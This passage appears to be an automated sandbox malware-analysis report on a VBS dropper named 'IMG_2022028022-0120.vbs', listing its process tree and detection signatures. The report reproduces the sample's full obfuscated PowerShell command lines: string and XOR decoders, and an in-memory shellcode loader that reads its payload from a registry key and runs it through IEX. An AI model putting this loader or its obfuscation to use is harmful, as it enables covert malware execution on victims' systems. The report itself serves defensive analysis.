At'PlBBoErhBFd6Ir9BlCSm9Ka6Sy9Sp1Wi8La0Pr8Gr8GoCDeBBiBRe7Mo9In0no8UnBBl9sa1ui8OpCSe8fj8Re8Hm0SyCEaBTrAReCHj8HaBBo9Ch1nd8Ma0Fo9Ve7Ro8ChALa9An5MeBUb6Sp8Co0Bo9Ki7Hj9Te3In8feCRe8Tr6Re8Ov0Un9Un6kuCPlBCiAHo8Ko8Fl4fl9ha7Ku9Ri6bl8UnDmo8St4Co8ls9SkBRe8UnDteFReDFoFMoALu6Ek8ToAFr9Da5La9DeCRiCBoDKoCZy1AiACy9Br8Sy0Re9Na0Sa8ef6Ge8SlCCa8Jo3Do8Ow0Bu9Bk7XiCbr9WhCCu5DdDKa5TnCPe9ItCTa5NgCFo5KoCNo1BaAPsARe9Pr1De8AbDPo8PlCte8reBAfDUf6CrCOv9HoCcr5JaDAl6viDSk0RoDPa6PeCSeCPl'He;Sc&Be(Hi`$AdSEktStyMorThkUneVatDerGrnReeOr7Bl)St Ar`$ReLPrsDeeLarSluArnFodSueDrrJesBegGleFllSksBleAnrLa0St;Sa`$hisOmiCozUneNo=mi`$PaLAmeStuIncQuiGofaleXerte.MacDeoCouennlitEm-Di3Sc5Qu3Bi;So`$GiLFrsFleSkrLvuPanKodloeDarFrsExgnoePrlPesBuePsrli1Rh Te=Fl SeHImTSkBCh Hy'UnBJaEBiBRa6Ih9MeCCa9Br6Ek9Ga1gr8Se0Kv8Te8StCmaBMaBRe7Pe9Fr0Wh8AbBSu9Kl1Be8MeCSu8Ci8Fl8be0FrCUnBPrANaCAf8DeBSu9Me1An8Gs0Hj9Rs7Re8DeASk9Ov5BeBEr6Ha8Li0Lf9Eg7Ly9Sp3Pe8UdCHe8Mi6No8Ju0Ha9Fr6AnCSuBToAGu8Ar8Be4Ul9Ph7Re9Pa6ge8BeDVa8Dr4Bu8By9LuBBr8HoDStFStDKoFTuAHe6La8reAVi9Sk5Sr9MaCCoCVeDSwCFu1DyAUn9ex8Rs0Fr9Vo0Tr8Fl6En8SyCUn8un3Ge8Li0St9Un7OkCAd9BuCat5ElDIn6GaDCo0efDSi6CoCGn9HjCVa5HoCvo1To8PrASp9Be7Pa8ReCUnCIn9UnCWr5InCPa1Vi9As6Ap8HyCCh9BlFSa8Hu0NiCBlCOm'Br;Lu&Ov(Ve`$BeSSttDuyDerInkMaePrtAlrAnnJneSp7En)Ek Ti`$NoLBesSnedirnauRenStdCaeWhrPrsLigRueLalCisDoeInrEx1Sr;El`$AmLAnsTreParPruGanSudLueAkrTasRagsteBolInsraeOlrGl2So Or=Si BrHScTSeBAn Ve'PnCUn1Ch9Fr3St8Tr4Co9Va7ToBEnAVi9Fe7Ex9Pa0Im8AnBFo8Ta8Ku8An0BoCBu5UbDCh8FoCDe5ToBCeEdeBOv6Fl9HiChe9Pu6Sk9Bl1Ud8Sp0Cy8Et8TaCVaBKnBSu7To9Fe0Ne8EkBSr9Ak1En8UnCBe8St8Be8He0MaCStBUdAAnCHe8AaBov9In1Pi8ud0Pl9Op7Pa8ZaABi9Fj5FuBMo6Ga8Vo0Sc9Bi7Tr9Di3Di8MaCOf8Up6Fo8Ep0Ko9Op6UnCSnBDiANo8dr8Un4Ka9St7ba9Al6Fi8arDSp8Aa4Ge8Bo9GhBPo8upDPsFFoDTrFDrAIn2Di8Be0Da9Pr1RiAga1Hj8Co0Ad8Bl9in8Pr0Ek8Ji2Al8He4Ja9fa1Af8He0FoAgl3Ve8UdAGe9De7BrARe3Ob9No0Sp8FjBim8Bi6Al9Le1Ra8TvCAp8SiApr8LyBIrBTe5In8MaAGe8FoCTo8DuBPa9Ku1Ka8Fu0En9Hk7BrCArDFoCBr1BiABeAKo9Al1Br8GaDTh8LuCTh8udBStDNa6EnCFu9DoCEx5SaCPoDUnASk2TuAPh1PhBNo1BeCMe5GaASl5SaCNiDPaBspEUnACaCSp8BeBRe9Fy1SnBMa5Wo9Co1Li9Ru7PiBFo8DeCBl9EgBKuEtrASoCOv8SuBHi9In1ReBBr5so9Xy1Be9Mu7BeBSc8LaCChCMaCPr5SuCGuDAsBBiECoBTe3Sm8SiAAp8MyCUt8St1PaBBl8LaCHyCbaCAmCShCngCGe'Pu;Fr&Fo(No`$BrSSutInytrrPakSoeAntSkrFanuneAf7No)De Tr`$ReLInsEgeSmrTauLanKadSpeOprAbsTegGleBrlKasSteInrst2In;Fa`$BlLLmsRoeBjrsauMinEndTreKarHesFagSkeGulTvsCheBurBa3Im Es=St BaHTaTdrBBo Bu'PrCEm1de9ud3Da8Pr4Te9du7AdBfeAjo9Al7An9Sk0St8BeBBa8Re8Vr8Li0CoCDoBErAUnCIn8ExBFl9Bo3St8SpARe8RoENu8Be0AsCBoDstCFe1Pr8AaAHo9wh7Fo8BeCLeCTr9InCBo1Va9Ud3Rh8Si4Ah9Si7DaBExAGr8ThBDa9yo1ToCTwCSp'We;Sk&go(Lu`$StSHetDeyprrMekBleKotomrSonWyeAl7Ti)Cr Pr`$ReLPrsSueGurAbuMenNedPaeDarSysTogSteaslIdsAdeFirBy3Te#Pj;""";;Function Lserundersgelser9 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Antidrug = $Antidrug + $HS.Substring($i, 1); } $Antidrug;}$Romerretlige0 = Lserundersgelser9 'AlIMeEPaXSa ';$Romerretlige2 = Lserundersgelser9 'opsFrtSraUrrHytPa-TjjUnoskbDi ';$Romerretlige1= Lserundersgelser9 $Badeanstalt;;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Romerretlige1 ;}else{&$Romerretlige0 $Romerretlige1;};;; MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5400 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 229); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Hdlc0=HTB 'B69C96918088CB818989';$Hdlc1=HTB 'A88C86978A968A8391CBB28C8BD6D7CBB08B96848380AB84918C9380A880918D8A8196';$Hdlc2=HTB 'A28091B5978A86A4818197809696';$Hdlc3=HTB 'B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083';$Hdlc4=HTB '9691978C8B82';$Hdlc5=HTB 'A28091A88A81908980AD848B818980';$Hdlc6=HTB 'B7B1B69580868C8489AB848880C9C5AD8C8180A79CB68C82C9C5B59087898C86';$Hdlc7=HTB 'B7908B918C8880C9C5A8848B84828081';$Hdlc8=HTB 'B78083898086918081A180898082849180';$Hdlc9=HTB 'AC8BA880888A979CA88A81908980';$Styrketrne0=HTB 'A89CA180898082849180B19C9580';$Styrketrne1=HTB 'A689849696C9C5B59087898C86C9C5B68084898081C9C5A48B968CA689849696C9C5A490918AA689849696';$Styrketrne2=HTB 'AC8B938A8E80';$Styrketrne3=HTB 'B59087898C86C9C5AD8C8180A79CB68C82C9C5AB8092B6898A91C9C5B38C9791908489';$Styrketrne4=HTB 'B38C9791908489A489898A86';$Styrketrne5=HTB '8B91818989';$Styrketrne6=HTB 'AB91B5978A91808691B38C9791908489A880888A979C';$Styrketrne7=HTB 'ACA0BD';$Styrketrne8=HTB 'B9';function fkp {Param ($v_m, $v_p) ;$Leucifer0 =HTB 'C193908B88C5D8C5CDBEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA28091A49696808887898C8096CDCCC599C5B28D809780C8AA878F808691C59EC5C1BACBA2898A878489A49696808887899CA684868D80C5C8A48B81C5C1BACBA98A8684918C8A8BCBB695898C91CDC1B6919C978E8091978B80DDCCBEC8D4B8CBA09490848996CDC1AD818986D5CCC598CCCBA28091B19C9580CDC1AD818986D4CC';&($Styrketrne7) $Leucifer0;$Leucifer5 = HTB 'C1938497BA829584C5D8C5C193908B88CBA28091A880918D8A81CDC1AD818986D7C9C5BEB19C9580BEB8B8C5A5CDC1AD818986D6C9C5C1AD818986D1CCCC';&($Styrketrne7) $Leucifer5;$Leucifer1 = HTB '97809190978BC5C1938497BA829584CBAC8B938A8E80CDC18B908989C9C5A5CDBEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083B8CDAB8092C8AA878F808691C5B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083CDCDAB8092C8AA878F808691C5AC8B91B59197CCC9C5CDC193908B88CBA28091A880918D8A81CDC1AD818986D0CCCCCBAC8B938A8E80CDC18B908989C9C5A5CDC193BA88CCCCCCCCC9C5C193BA95CCCC';&($Styrketrne7) $Leucifer1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Leucifer2 = HTB 'C1B3B1A7C5D8C5BEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA180838C8B80A19C8B84888C86A49696808887899CCDCDAB8092C8AA878F808691C5B69C96918088CBB78083898086918C8A8BCBA49696808887899CAB848880CDC1AD818986DDCCCCC9C5BEB69C96918088CBB78083898086918C8A8BCBA0888C91CBA49696808887899CA7908C89818097A48686809696B8DFDFB7908BCCCBA180838C8B80A19C8B84888C86A88A81908980CDC1AD818986DCC9C5C18384899680CCCBA180838C8B80B19C9580CDC1B6919C978E8091978B80D5C9C5C1B6919C978E8091978B80D4C9C5BEB69C96918088CBA89089918C86849691A180898082849180B8CC';&($Styrketrne7) $Leucifer2;$Leucifer3 = HTB 'C1B3B1A7CBA180838C8B80A68A8B9691979086918A97CDC1AD818986D3C9C5BEB69C96918088CBB78083898086918C8A8BCBA68489898C8B82A68A8B93808B918C8A8B96B8DFDFB691848B81849781C9C5C1938497BA95849784888091809796CCCBB68091AC8895898088808B9184918C8A8BA389848296CDC1AD818986D2CC';&($Styrketrne7) $Leucifer3;$Leucifer4 = HTB 'C1B3B1A7CBA180838C8B80A880918D8A81CDC1B6919C978E8091978B80D7C9C5C1B6919C978E8091978B80D6C9C5C1939791C9C5C1938497BA95849784888091809796CCCBB68091AC8895898088808B9184918C8A8BA389848296CDC1AD818986D2CC';&($Styrketrne7) $Leucifer4;$Leucifer5 = HTB '97809190978BC5C1B3B1A7CBA69780849180B19C9580CDCC';&($Styrketrne7) $Leucifer5 ;}$kk = HTB '8E80978B8089D6D7';$Leucifer6 = HTB 'C1938497BA9384C5D8C5BEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBA88497968D8489B8DFDFA28091A180898082849180A38A97A3908B86918C8A8BB58A8C8B918097CDCD838E95C5C18E8EC5C1B6919C978E8091978B80D1CCC9C5CDA2A1B1C5A5CDBEAC8B91B59197B8C9C5BEB0AC8B91D6D7B8C9C5BEB0AC8B91D6D7B8C9C5BEB0AC8B91D6D7B8CCC5CDBEAC8B91B59197B8CCCCCC';&($Styrketrne7) $Leucifer6;$var_nt = fkp $Styrketrne5 $Styrketrne6;$Leucifer7 = HTB 'C1AA918D8C8BD6C5D8C5C1938497BA9384CBAC8B938A8E80CDBEAC8B91B59197B8DFDFBF80978AC9C5D6D0D6C9C5D59DD6D5D5D5C9C5D59DD1D5CC';&($Styrketrne7) $Leucifer7;$Leucifer8 = HTB 'C18A978CC5D8C5C1938497BA9384CBAC8B938A8E80CDBEAC8B91B59197B8DFDFBF80978AC9C5D59DD4D5D5D5D5D5C9C5D59DD6D5D5D5C9C5D59DD1CC';&($Styrketrne7) $Leucifer8;$Lserundersgelser=(Get-ItemProperty -Path 'HKCU:\Metagnomy\eagled').Sarcologist;$Leucifer9 = HTB 'C1A98090868C838097C5D8C5BEB69C96918088CBA68A8B93809791B8DFDFA3978A88A7849680D3D1B691978C8B82CDC1A9968097908B81809796828089968097CC';&($Styrketrne7) $Leucifer9;$Lserundersgelser0 = HTB 'BEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBA88497968D8489B8DFDFA68A959CCDC1A98090868C838097C9C5D5C9C5C5C1AA918D8C8BD6C9C5D6D0D6CC';&($Styrketrne7) $Lserundersgelser0;$size=$Leucifer.count-353;$Lserundersgelser1 = HTB 'BEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBA88497968D8489B8DFDFA68A959CCDC1A98090868C838097C9C5D6D0D6C9C5C18A978CC9C5C1968C9F80CC';&($Styrketrne7) $Lserundersgelser1;$Lserundersgelser2 = HTB 'C1938497BA97908B8880C5D8C5BEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBA88497968D8489B8DFDFA28091A180898082849180A38A97A3908B86918C8A8BB58A8C8B918097CDC1AA918D8C8BD6C9C5CDA2A1B1C5A5CDBEAC8B91B59197B8C9BEAC8B91B59197B8CCC5CDBEB38A8C81B8CCCCCC';&($Styrketrne7) $Lserundersgelser2;$Lserundersgelser3 = HTB 'C1938497BA97908B8880CBAC8B938A8E80CDC18A978CC9C1938497BA8B91CC';&($Styrketrne7) $Lserundersgelser3# MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

System Summary

barindex
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9Jump to behavior
Potential malicious VBS script found (suspicious strings)
Source: Initial file: Fusendes.ShellExecute Nske,Br0, "", "", 0
Very long command line found
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 17542
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5700
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 17542Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5700Jump to behavior
Source: IMG_2022028022-0120.vbsInitial sample: Strings found which are bigger than 50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG_2022028022-0120.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo 